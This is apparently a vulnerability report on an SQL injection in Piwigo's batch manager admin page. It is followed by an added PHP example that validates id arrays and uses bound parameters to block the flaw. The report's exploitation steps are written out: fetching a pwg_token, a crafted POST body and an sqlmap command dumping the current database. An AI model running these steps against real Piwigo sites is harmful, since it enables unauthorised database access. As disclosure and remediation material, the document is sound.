I found that there is an SQLi in Piwigo; here is my description:
First we need to log in, and then we can visit http://your-url/admin.php
Then we need a key parameter called pwg_token; there are many ways to get a token.
I visited http://your-url/admin.php?page=user_list
and then I got pwg_token=3c28c3bf6adc56b0695cf64073605f9b
The point of vulnerability is in admin/batch_manager_global.php; the parameter selection is not filtered.
The unfiltered parameter selection is spliced.
The next step is to capture packets using BurpSuite by simply constructing parameters:
selection%5B%5D=1&selectAction=delete_derivatives&submit=1&del_derivatives_type=1&del_tags%5B%5D=1&pwg_token=4a3513cd81aa311107704fd00bde0a79
Remember to replace the value of the token above.
Save the parameters to a file, then just use sqlmap to exploit:
python sqlmap.py -r 1233 --current-db
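
One way to close the class of bug reported above, as an added example that is not part of the original report and is not Piwigo's code: validate every element of an id array as digits only, then pass the ids as bound values instead of splicing them into the statement. The helper names, the `images` table and the in-memory SQLite database (PDO SQLite driver assumed available) are constructed for the demo.

```php
<?php
// Hypothetical helper (not Piwigo code): accept only a non-empty array of
// digit-only ids from a request array and reject everything else.
function parse_id_list(array $request, string $key): array
{
    $values = $request[$key] ?? null;
    if (!is_array($values) || $values === []) {
        throw new InvalidArgumentException("$key must be a non-empty array");
    }
    $ids = [];
    foreach ($values as $value) {
        // 1-9 digits only: no signs, spaces, quotes or nested arrays.
        if (!is_string($value) || preg_match('/\A[0-9]{1,9}\z/', $value) !== 1) {
            throw new InvalidArgumentException("$key contains a non-numeric id");
        }
        $ids[] = (int) $value;
    }
    return array_values(array_unique($ids));
}

// Build IN (...) from placeholders so the ids travel as bound integers
// and are never concatenated into the statement text.
function select_images(PDO $db, array $ids): array
{
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT id, file FROM images WHERE id IN ($marks) ORDER BY id");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE images (id INTEGER PRIMARY KEY, file TEXT)');
$db->exec("INSERT INTO images VALUES (1, 'a.jpg'), (2, 'b.jpg'), (3, 'c.jpg')");

// Constructed request bodies: one well-formed, one carrying SQL text.
$good = ['selection' => ['1', '3']];
$bad  = ['selection' => ['1', '1 OR 1=1']];
print_r(select_images($db, parse_id_list($good, 'selection')));
try {
    parse_id_list($bad, 'selection');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```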